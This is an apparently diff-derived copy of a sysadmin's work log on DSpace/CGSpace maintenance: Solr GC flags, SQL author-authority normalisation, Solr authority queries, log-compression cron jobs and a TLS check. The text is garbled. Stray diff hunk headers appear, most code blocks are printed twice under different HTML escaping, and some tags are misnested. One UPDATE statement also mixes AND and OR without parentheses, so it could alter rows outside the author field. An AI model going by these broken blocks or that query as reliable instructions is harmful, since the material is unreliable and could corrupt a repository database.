<li>In other news, I&rsquo;m looking at JVM settings from the Solr 4.10.2 release, from <code>bin/solr.in.sh</code>:</li>
</ul>
<pre><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&quot;-XX:-UseSuperWord \
<pre tabindex="0"><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&#34;-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@ -296,7 +296,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
-XX:+AggressiveOpts&quot;
-XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>I need to try these because they are recommended by the Solr project itself</li>
<li>Also, as always, I need to read <a href="https://wiki.apache.org/solr/ShawnHeisey">Shawn Heisey&rsquo;s wiki page on Solr</a></li>
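<li>If I do try them, on this setup they would presumably go into Tomcat&rsquo;s <code>JAVA_OPTS</code>, for example in <code>/etc/default/tomcat7</code> (a sketch with only a few of the flags above, not a tested configuration):
<pre tabindex="0"><code>JAVA_OPTS="$JAVA_OPTS -XX:NewRatio=3 -XX:SurvivorRatio=4 -XX:TargetSurvivorRatio=90 -XX:+ParallelRefProcEnabled"
</code></pre>
</li>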
@ -311,7 +311,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<li>Atmire responded about the MQM warnings in the DSpace logs</li>
<li>Apparently we need to change the batch edit consumers in <code>dspace/config/dspace.cfg</code>:</li>
</ul>
<pre><code>event.consumer.batchedit.filters = Community|Collection+Create
<pre tabindex="0"><code>event.consumer.batchedit.filters = Community|Collection+Create
</code></pre><ul>
<li>I haven&rsquo;t tested it yet, but I created a pull request: <a href="https://github.com/ilri/DSpace/pull/289">#289</a></li>
</ul>
@ -319,17 +319,17 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<ul>
<li>Some author authority corrections and name standardizations for Peter:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
UPDATE 11
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
UPDATE 36
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
UPDATE 14
dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
dspace=# update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
UPDATE 42
dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
dspace=# update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
UPDATE 360
dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Pay attention to the regex to prevent false positives in tricky cases with Dutch names!</li>
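<li>For example, the <code>text_value !~ '^.*W\.?$'</code> clause is presumably there to leave names ending in a &ldquo;W.&rdquo; initial alone; a quick sanity check of what it excludes (a sketch) would be:
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value ~ '^.*W\.?$';
</code></pre>
</li>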
@ -343,7 +343,7 @@ UPDATE 561
<li>The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn&rsquo;t dedicated (also runs Solr, which can benefit from OS cache) so let&rsquo;s try 1024MB</li>
<li>In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):</li>
</ul>
<pre><code>$ time JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@ -376,31 +376,31 @@ sys 0m22.647s
<li>For example, do a Solr query for &ldquo;first_name:Grace&rdquo; and look at the results</li>
<li>Querying that ID shows the fields that need to be changed:</li>
</ul>
<pre><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;q&quot;: &quot;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1481102189244&quot;
<pre tabindex="0"><code>{
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;q&#34;: &#34;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1481102189244&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;id&quot;: &quot;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;field&quot;: &quot;dc_contributor_author&quot;,
&quot;value&quot;: &quot;Grace, D.&quot;,
&quot;deleted&quot;: false,
&quot;creation_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;last_modified_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;authority_type&quot;: &quot;person&quot;,
&quot;first_name&quot;: &quot;D.&quot;,
&quot;last_name&quot;: &quot;Grace&quot;
&#34;id&#34;: &#34;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;field&#34;: &#34;dc_contributor_author&#34;,
&#34;value&#34;: &#34;Grace, D.&#34;,
&#34;deleted&#34;: false,
&#34;creation_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;last_modified_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;authority_type&#34;: &#34;person&#34;,
&#34;first_name&#34;: &#34;D.&#34;,
&#34;last_name&#34;: &#34;Grace&#34;
}
]
}
@ -409,51 +409,51 @@ sys 0m22.647s
<li>I think I can just update the <code>value</code>, <code>first_name</code>, and <code>last_name</code> fields&hellip;</li>
<li>The update syntax should be something like this, but I&rsquo;m getting errors from Solr:</li>
</ul>
<pre><code>$ curl 'localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true' -H 'Content-type:application/json' -d '[{&quot;id&quot;:&quot;1&quot;,&quot;price&quot;:{&quot;set&quot;:100}}]'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true&#39; -H &#39;Content-type:application/json&#39; -d &#39;[{&#34;id&#34;:&#34;1&#34;,&#34;price&#34;:{&#34;set&#34;:100}}]&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:400,
&quot;QTime&quot;:0},
&quot;error&quot;:{
&quot;msg&quot;:&quot;Unexpected character '[' (code 91) in prolog; expected '&lt;'\n at [row,col {unknown-source}]: [1,1]&quot;,
&quot;code&quot;:400}}
&#34;responseHeader&#34;:{
&#34;status&#34;:400,
&#34;QTime&#34;:0},
&#34;error&#34;:{
&#34;msg&#34;:&#34;Unexpected character &#39;[&#39; (code 91) in prolog; expected &#39;&lt;&#39;\n at [row,col {unknown-source}]: [1,1]&#34;,
&#34;code&#34;:400}}
</code></pre><ul>
<li>When I try using the XML format I get an error that the <code>updateLog</code> needs to be configured for that core</li>
<li>Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Then I&rsquo;ll reindex discovery and authority and see how the authority Solr core looks</li>
<li>After this, now there are authorities for some of the &ldquo;Grace, D.&rdquo; and &ldquo;Grace, Delia&rdquo; text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):</li>
</ul>
<pre><code>$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;id:18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:1,&quot;start&quot;:0,&quot;docs&quot;:[
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;id:18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:1,&#34;start&#34;:0,&#34;docs&#34;:[
{
&quot;id&quot;:&quot;18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;field&quot;:&quot;dc_contributor_author&quot;,
&quot;value&quot;:&quot;Grace, Delia&quot;,
&quot;deleted&quot;:false,
&quot;creation_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;last_modified_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;authority_type&quot;:&quot;person&quot;,
&quot;first_name&quot;:&quot;Delia&quot;,
&quot;last_name&quot;:&quot;Grace&quot;}]
&#34;id&#34;:&#34;18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;field&#34;:&#34;dc_contributor_author&#34;,
&#34;value&#34;:&#34;Grace, Delia&#34;,
&#34;deleted&#34;:false,
&#34;creation_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;last_modified_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;authority_type&#34;:&#34;person&#34;,
&#34;first_name&#34;:&#34;Delia&#34;,
&#34;last_name&#34;:&#34;Grace&#34;}]
}}
</code></pre><ul>
<li>So now I could set them all to this ID and the name would be ok, but there has to be a better way!</li>
<li>In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!</li>
<li>Better to use:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><ul>
<li>This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!</li>
<li>Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID</li>
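<li>Roughly, that idea would look something like this (a sketch only; the UUID is a placeholder that would come from <code>uuidgen</code>):
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='new-uuid-here', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value='Grace, Delia';
-- re-index authority so the new record gets synced from PostgreSQL to Solr, then:
dspace=# update metadatavalue set text_value='Grace, Delia', authority='new-uuid-here', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
</code></pre>
</li>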
@ -461,17 +461,17 @@ UPDATE 561
<li>Deploy &ldquo;take task&rdquo; hack/fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/290">#290</a>)</li>
<li>I ran the following author corrections and then reindexed discovery:</li>
</ul>
<pre><code>update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><h2 id="2016-12-08">2016-12-08</h2>
<ul>
<li>Something weird happened and Peter Thorne&rsquo;s names all ended up as &ldquo;Thorne&rdquo;, I guess because the original authority had that as its name value:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne%&#39;;
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
</code></pre><ul>
<li>I generated a new UUID using <code>uuidgen | tr [A-Z] [a-z]</code> and set it along with correct name variation for all records:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b2f7603d-2fb5-4018-923a-c4ec8d85b3bb&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;;
UPDATE 43
</code></pre><ul>
<li>Apparently we also need to normalize Phil Thornton&rsquo;s names to <code>Thornton, Philip K.</code>:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@ -506,7 +506,7 @@ UPDATE 43
</code></pre><ul>
<li>Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
UPDATE 362
</code></pre><ul>
<li>It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)</li>
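<li>In practice that ordering would be something like the following (a sketch; these are the stock DSpace CLI commands, and <code>-b</code> forces a full Discovery rebuild):</li>
</ul>
<pre><code>$ [dspace]/bin/dspace index-authority
$ [dspace]/bin/dspace index-discovery -b
</code></pre><ul>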
@ -520,8 +520,8 @@ UPDATE 362
<li>Set PostgreSQL&rsquo;s <code>shared_buffers</code> on CGSpace to 10% of system RAM (1200MB)</li>
<li>Run the following author corrections on CGSpace:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;34df639a-42d8-4867-a3f2-1892075fcb3f&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39; or authority=&#39;021cd183-946b-42bb-964e-522ebff02993&#39;;
dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
</code></pre><ul>
<li>The authority IDs were different now than when I was looking a few days ago so I had to adjust them here</li>
</ul>
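<ul>
<li>One way to check which authority ID is current before writing the SQL is to query the Solr authority core directly (a sketch; the port, core name, and field name are assumptions based on our setup):</li>
</ul>
<pre><code>$ curl 'http://localhost:8081/solr/authority/select?q=value:%22Thorne,+P.J.%22&amp;wt=json&amp;indent=true'
</code></pre>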
@ -534,7 +534,7 @@ dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab76
<ul>
<li>Looking at CIAT records from last week again, they have a lot of double authors like:</li>
</ul>
<pre><code>International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
<pre tabindex="0"><code>International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::500
International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::0
</code></pre><ul>
@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
<li>Removing the duplicates in OpenRefine and uploading a CSV to DSpace says &ldquo;no changes detected&rdquo;</li>
<li>Seems like the only way to sort of clean these up would be to start in SQL:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Center for Tropical Agriculture&#39;;
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
UPDATE 1693
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, text_value=&#39;International Center for Tropical Agriculture&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%CIAT%&#39;;
UPDATE 35
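dspace=# -- hypothetical follow-up (a sketch, not run here): which items still have more than one CIAT affiliation row?
dspace=# select resource_id, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture' group by resource_id having count(*) &gt; 1;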
</code></pre><ul>
<li>Work on article for KM4Dev journal</li>
@ -577,14 +577,14 @@ UPDATE 35
<li>So basically, new cron jobs for logs should look something like this:</li>
<li>Find any file named <code>*.log*</code> that isn&rsquo;t <code>dspace.log*</code>, isn&rsquo;t already zipped, and is older than one day, and zip it:</li>
</ul>
<pre><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &quot;.*\.log.*&quot; ! -iregex &quot;.*dspace\.log.*&quot; ! -iregex &quot;.*\.(gz|lrz|lzo|xz)&quot; ! -newermt &quot;Yesterday&quot; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*&#34; ! -iregex &#34;.*dspace\.log.*&#34; ! -iregex &#34;.*\.(gz|lrz|lzo|xz)&#34; ! -newermt &#34;Yesterday&#34; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
</code></pre><ul>
<li>Since there are <code>xzgrep</code> and <code>xzless</code>, we can actually just zip them after one day, why not?!</li>
<li>We can keep the zipped ones for two weeks just in case we need to look for errors, etc., and delete them after that (see the deletion sketch after the scheduling output below)</li>
<li>I use <code>schedtool -B</code> and <code>ionice -c2 -n7</code> to set the CPU scheduling to <code>SCHED_BATCH</code> and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less</li>
<li>When the tasks are running you can see that the policies do apply:</li>
</ul>
<pre><code>$ schedtool $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}') &amp;&amp; ionice -p $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}')
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;) &amp;&amp; ionice -p $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;)
PID 17049: PRIO 0, POLICY B: SCHED_BATCH , NICE 0, AFFINITY 0xf
best-effort: prio 7
</code></pre><ul>
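<li>A possible companion cron job for the deletion step, plus an example of searching a compressed log (a sketch; the path, file name, retention period, and extension list are assumptions):</li>
</ul>
<pre><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*\.(gz|lrz|lzo|xz)" -mtime +14 -delete
# xzgrep -c ERROR /home/dspacetest.cgiar.org/log/solr.log.2016-12-10.xz
</code></pre><ul>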
@ -594,7 +594,7 @@ best-effort: prio 7
<li>Some users pointed out issues with the &ldquo;most popular&rdquo; stats on a community or collection</li>
<li>This error appears in the logs when you try to view them:</li>
</ul>
<pre><code>2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
<li>None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then</li>
<li>Update some names and authorities in the database:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;5ff35043-942e-4d0a-b377-4daed6e3c1a3&#39;, confidence=600, text_value=&#39;Duncan, Alan&#39; where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*Duncan,? A.*&#39;;
UPDATE 204
dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
dspace=# update metadatavalue set authority=&#39;46804b53-ea30-4a85-9ccf-b79a35816fa9&#39;, confidence=600, text_value=&#39;Mekonnen, Kindu&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Mekonnen, K%&#39;;
UPDATE 89
dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
dspace=# update metadatavalue set authority=&#39;f840da02-26e7-4a74-b7ba-3e2b723f3684&#39;, confidence=600, text_value=&#39;Lukuyu, Ben A.&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Lukuyu, B%&#39;;
UPDATE 140
</code></pre><ul>
<li>Generated a new UUID for Ben using <code>uuidgen | tr [A-Z] [a-z]</code> as the one in Solr had his ORCID but the name format was incorrect</li>
@ -692,7 +692,7 @@ UPDATE 140
<li>Enable OCSP stapling for hosts &gt;= Ubuntu 16.04 in our Ansible playbooks (<a href="https://github.com/ilri/rmg-ansible-public/pull/76">#76</a>)</li>
<li>Working for DSpace Test on the second response:</li>
</ul>
<pre><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
